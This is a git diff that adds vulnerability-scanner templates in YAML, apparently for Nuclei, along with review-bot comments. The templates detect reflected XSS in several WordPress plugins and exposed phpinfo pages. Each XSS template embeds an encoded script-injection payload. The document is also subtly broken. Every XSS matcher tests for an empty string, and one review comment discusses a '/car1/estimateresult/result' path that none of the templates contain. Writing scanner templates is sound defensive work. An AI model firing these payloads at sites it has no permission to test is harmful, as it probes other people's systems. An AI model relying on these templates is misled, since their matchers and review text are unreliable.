file mode 100644 index 0000000..e8b37ed --- /dev/null +++ b/CVE-2021-24389.yaml 
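Review bot: The path hard-codes `/car1/estimateresult/result`, and `car1` reads like the page slug of one particular site rather than a route the theme installs, so the template is likely to miss installs whose estimate page lives under a different slug. If that is the case, say so in `description` so operators know the slug may need adjusting; this is inferred from the path alone and should be confirmed against the theme.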
@@ -0,0 +1,30 @@ +id: CVE-2021-24389 + +info: + name: FoodBakery < 2.2 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + description: The WP Foodbakery WordPress plugin before 2.2, used in the FoodBakery WordPress theme before 2.2 did not properly sanitize the foodbakery_radius parameter before outputting it back in the response, leading to an unauthenticated Reflected Cross-Site Scripting (XSS) vulnerability. + reference: https://nvd.nist.gov/vuln/detail/CVE-2021-24389 + tags: cve,cve2021,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/listings/?search_title=&location=&foodbakery_locations_position=filter&search_type=autocomplete&foodbakery_radius=10%22%3E%3Cscript%3Eprompt(123)%3C/script%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/phpinfo.yaml b/phpinfo.yaml new file mode 100644 index 0000000..7e13584 --- /dev/null +++ b/phpinfo.yaml 
@@ -0,0 +1,47 @@ +id: phpinfo-files + +info: + name: phpinfo Disclosure + author: pdteam,daffainfo,meme-lord + severity: low + tags: config,exposure + +requests: + - method: GET + path: + - "{{BaseURL}}/php.php" + - "{{BaseURL}}/phpinfo.php" + - "{{BaseURL}}/info.php" + - "{{BaseURL}}/infophp.php" + - "{{BaseURL}}/php_info.php" + - "{{BaseURL}}/test.php" + - "{{BaseURL}}/i.php" + - "{{BaseURL}}/asdf.php" + - "{{BaseURL}}/pinfo.php" + - "{{BaseURL}}/phpversion.php" + - "{{BaseURL}}/time.php" + - "{{BaseURL}}/index.php" + - "{{BaseURL}}/temp.php" + - "{{BaseURL}}/old_phpinfo.php" + - "{{BaseURL}}/infos.php" + - "{{BaseURL}}/linusadmin-phpinfo.php" + - "{{BaseURL}}/php-info.php" + + matchers-condition: and + matchers: + - type: word + words: + - "PHP Extension" + - "PHP Version" + condition: and + + - type: status + status: + - 200 + + extractors: + - type: regex + part: body + group: 1 + regex: + - '>PHP Version <\/td>([0-9.]+)' \ No newline at end of file diff --git a/wp-custom-tables-xss.yaml b/wp-custom-tables-xss.yaml new file mode 100644 index 0000000..d29132c --- /dev/null +++ b/wp-custom-tables-xss.yaml @@ -0,0 +1,30 @@ +id: wp-custom-tables-xss + +info: + name: WordPress Custom Tables Plugin 3.4.4 - Reflected Cross Site Scripting (XSS) + author: daffainfo + severity: medium + description: WordPress custom tables Plugin 'key' Parameter Cross Site Scripting Vulnerability + reference: https://www.securityfocus.com/bid/54326/info + tags: wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/custom-tables/iframe.php?s=1&key=%22%3E%3Cscript%3Ealert%28123%29%3C/script%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/wp-flagem-xss.yaml b/wp-flagem-xss.yaml new file mode 100644 index 0000000..bcd78b1 --- /dev/null +++ b/wp-flagem-xss.yaml 
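Review bot: phpinfo.yaml is committed without a trailing newline (`\ No newline at end of file`) while this same patch fixes exactly that in the ten edited templates; add the final newline so the file does not need another touch-up commit. The path list also includes `/index.php`, which is the front page of essentially every PHP site; the `and` on `PHP Extension` and `PHP Version` keeps false positives down, but it adds one request per target whose low hit rate is worth a comment if it is intentional.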
@@ -0,0 +1,29 @@ +id: wp-flagem-xss + +info: + name: WordPress Plugin FlagEm - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: https://www.exploit-db.com/exploits/38674 + tags: wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/FlagEm/flagit.php?cID=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/wp-nextgen-xss.yaml b/wp-nextgen-xss.yaml new file mode 100644 index 0000000..30f3806 --- /dev/null +++ b/wp-nextgen-xss.yaml @@ -0,0 +1,29 @@ +id: wp-nextgen-xss + +info: + name: WordPress Plugin NextGEN Gallery 1.9.10 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: https://www.securityfocus.com/bid/57200/info + tags: wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/nextgen-gallery/nggallery.php?test-head=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/wp-slideshow-xss.yaml b/wp-slideshow-xss.yaml new file mode 100644 index 0000000..41649c2 --- /dev/null +++ b/wp-slideshow-xss.yaml 
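Review bot: wp-flagem-xss's `name` (`WordPress Plugin FlagEm - Reflected Cross-Site Scripting (XSS)`) carries no version bound, unlike the other templates in this patch, so a hit gives the operator no way to judge whether the installed version is expected to be affected; wp-slideshow-xss has the same gap. If the referenced advisory gives the affected version, put it in the name as the others do; otherwise state in `description` that the affected range is not known.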
@@ -0,0 +1,32 @@ +id: wp-slideshow-xss + +info: + name: WordPress Plugin Slideshow - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: https://www.exploit-db.com/exploits/37948 + tags: wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php?randomId=%22%3B%3E%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E' + - '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php?slides[0][type]=text&slides[0][title]=%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E' + - '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPluginPostType/settings.php?settings[][group]=%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E' + - '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPluginPostType/style-settings.php?settings[0]&inputFields[0]=%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200